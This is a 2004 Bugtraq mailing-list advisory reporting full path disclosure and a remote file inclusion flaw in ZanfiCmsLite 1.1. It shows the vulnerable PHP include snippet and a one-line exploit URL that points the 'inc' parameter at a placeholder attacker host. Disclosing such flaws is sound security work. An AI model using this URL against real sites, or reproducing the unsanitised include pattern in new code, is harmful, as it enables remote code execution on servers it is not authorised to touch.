Multiple vulnerabilities in ZanfiCmsLite

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Multiple vulnerabilities in ZanfiCmsLite
From: Lin Xiaofeng <Cracklove@xxxxxxxxx>
Date: 11 Oct 2004 12:59:48 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


********************************** 
*AuThor:Cracklove                * 
*emA!l:Cracklove[at]Gmail[dot]Com* 
*HoMePaGe:http://ProxySky.com    * 
********************************** 

[Info] 

Website: http://www.zanfi.nl 
Version: 1.1,The Newest Version 
Problem: Full path disclosure,Include file 

[Vuls] 

1.Full path disclosure: 

Let's try to request like this: 

http://localhost/cms/adm_pages.php 

and we get standard error messages like that: 

Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in 
c:\appserv\www\cms\adm_pages.php on line 2 
No blocks in the table 

The Problem also in 
corr_pages.php,del_block.php,del_page.php,footer.php,home.php etc. 


2.Include file 

Ok let's open ./index.php,We see 

if (!isset($inc)): 
    include ("home.php"); 
else: 
    include ($inc.".php"); 
endif; 

O Yeah!See u Again Include Vul! 

[Exploit] 

http://target/index.php?inc=http://[Attacker] 

[Fix] 

Vuls has been reported to autuor,No reply yet. 

[Greetings] 

Greets To Lcx,Fatb,Envymask,S4T,ITS,CHT,WDYL,~The WhackerZ~ TeAm. 

http://www.proxysky.com/vulz/show.php?id=3

Prev by Date: [SECURITY] [DSA 562-1] New mysql packages fix several vulnerabilities
Next by Date: [MAxpatrol Security Advisory] Multiple vulnerabilities in GoSmart Message Board
Previous by thread: [SECURITY] [DSA 562-1] New mysql packages fix several vulnerabilities
Next by thread: [MAxpatrol Security Advisory] Multiple vulnerabilities in GoSmart Message Board
Index(es):
- Date
- Thread